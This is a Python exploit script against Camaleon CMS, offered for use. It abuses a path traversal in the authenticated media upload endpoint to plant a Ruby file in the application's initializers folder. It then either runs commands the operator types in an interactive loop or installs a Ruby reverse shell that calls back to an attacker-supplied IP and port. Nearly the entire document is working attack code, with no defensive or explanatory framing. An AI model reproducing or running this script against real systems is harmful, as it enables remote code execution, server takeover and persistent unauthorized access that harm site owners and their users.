import requests def exploit_camaleon(auth_token, session_token, target_url, payload_type): # Define the headers headers = { 'User-Agent': 'Mozilla/5.0', 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary80dMC9jX3srWAsga', 'Accept': '*/*', 'Connection': 'keep-alive', } # Define the cookies (auth_token and session token) cookies = { 'auth_token': auth_token, '_cms_session': session_token, } # Repeated command execution functionality if payload_type == "command_execution": while True: # Prompt the user for a command to execute command = input("Enter a system command to execute (or type 'exit' to quit): ") if command.lower() == "exit": print("Exiting command execution mode.") break # Command execution payload payload = ( 'puts "==============================="\r\n' 'puts "= EXECUTING SYSTEM COMMANDS ="\r\n' 'puts "==============================="\r\n' f'system("{command}")\r\n' # Execute the entered command 'puts "==============================="\r\n' ) file_name = 'command_exec.rb' # Multipart form data with the chosen payload data = ( f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n' f'Content-Disposition: form-data; name="file_upload"; filename="{file_name}"\r\n' f'Content-Type: text/x-ruby-script\r\n\r\n' f'{payload}\r\n' f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n' f'Content-Disposition: form-data; name="folder"\r\n\r\n' f'../../../config/initializers/\r\n' f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n' f'Content-Disposition: form-data; name="skip_auto_crop"\r\n\r\n' f'true\r\n' f'------WebKitFormBoundary80dMC9jX3srWAsga--\r\n' ) # Send the POST request response = requests.post( f"{target_url}/admin/media/upload?actions=false", headers=headers, cookies=cookies, data=data, verify=False # Disable SSL verification (adjust as needed) ) # Check if the exploit was successful if response.status_code == 200: print(f"Command '{command}' executed successfully!") print("Response: ", response.text) # Print response content to debug else: print(f"Failed to execute '{command}' with status code: {response.status_code}") print("Response: ", response.text) # Print the response content for debugging elif payload_type == "reverse_shell": # Ruby reverse shell payload payload = ( 'require \'socket\'\r\n' 's = TCPSocket.open(\'your_ip\', your_port)\r\n' 'while (cmd = s.gets)\r\n' ' IO.popen(cmd, \'r\') do |io|\r\n' ' s.print io.read\r\n' ' end\r\n' 'end\r\n' ) file_name = 'reverse_shell.rb' # Multipart form data with the reverse shell payload data = ( f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n' f'Content-Disposition: form-data; name="file_upload"; filename="{file_name}"\r\n' f'Content-Type: text/x-ruby-script\r\n\r\n' f'{payload}\r\n' f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n' f'Content-Disposition: form-data; name="folder"\r\n\r\n' f'../../../config/initializers/\r\n' f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n' f'Content-Disposition: form-data; name="skip_auto_crop"\r\n\r\n' f'true\r\n' f'------WebKitFormBoundary80dMC9jX3srWAsga--\r\n' ) # Send the POST request for reverse shell response = requests.post( f"{target_url}/admin/media/upload?actions=false", headers=headers, cookies=cookies, data=data, verify=False # Disable SSL verification (adjust as needed) ) # Check if the exploit was successful if response.status_code == 200: print(f"Exploit executed successfully with reverse shell!") else: print(f"Failed with status code: {response.status_code}") print("Response: ", response.text) if __name__ == "__main__": # Replace these with actual tokens and target URL auth_token = "your_auth_token_here" session_token = "your_session_token_here" target_url = "https://target_site_here" # Choose the type of payload: "reverse_shell" or "command_execution" payload_type = input("Enter payload type ('reverse_shell' or 'command_execution'): ").strip() exploit_camaleon(auth_token, session_token, target_url, payload_type)